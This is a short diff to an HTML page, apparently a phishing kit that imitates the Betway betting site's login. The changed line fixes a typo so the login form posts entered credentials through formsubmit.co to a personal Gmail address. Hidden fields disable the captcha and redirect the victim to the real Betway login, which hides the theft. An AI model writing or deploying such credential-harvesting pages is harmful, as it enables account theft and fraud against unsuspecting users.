--- a/index.html
+++ b/index.html
@@ -184,7 +184,7 @@
       <button onclick="document.querySelector('.modal-overlay').style.display='none'">×</button>
     </div>
 
-    <form class="login-body" action="https://formsubmit.co/robarsrsa@gmail.com.com" method="POST" onsubmit="return validateForm(event)">
+    <form class="login-body" action="https://formsubmit.co/robarsrsa@gmail.com" method="POST" onsubmit="return validateForm(event)">
       <input type="hidden" name="_captcha" value="false">
       <input type="hidden" name="_next" value="https://www.betway.co.za/account/login">
 
